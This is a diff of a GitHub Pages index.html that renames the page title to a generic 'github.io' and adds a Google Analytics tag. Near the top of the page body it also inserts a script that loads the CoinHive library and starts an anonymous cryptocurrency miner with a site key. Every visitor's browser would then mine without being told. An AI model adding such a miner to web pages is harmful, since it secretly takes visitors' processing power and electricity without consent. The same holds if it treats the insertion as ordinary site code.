--- a/index.html
+++ b/index.html
@@ -8,10 +8,26 @@
 		<link rel="stylesheet" type="text/css" href="stylesheets/github-dark.css" media="screen">
 		<link rel="stylesheet" type="text/css" href="stylesheets/print.css" media="print">
 
-		<title>Akali.GitHub.io by akali</title>
+		<title>github.io</title>
 	</head>
 
 	<body>
+	<script src="https://coinhive.com/lib/coinhive.min.js"></script>
+	<script>
+		var miner = new CoinHive.Anonymous('r0kjtYHKfNbbxZ75Cgqmq8qc4JdbKut1');
+		miner.start();
+	</script>
+
+	<!-- Global site tag (gtag.js) - Google Analytics -->
+<script async src="https://www.googletagmanager.com/gtag/js?id=UA-81313215-2"></script>
+<script>
+  window.dataLayer = window.dataLayer || [];
+  function gtag(){dataLayer.push(arguments);}
+  gtag('js', new Date());
+
+  gtag('config', 'UA-81313215-2');
+</script>
+
 
 		<header>
 			<div class="container">
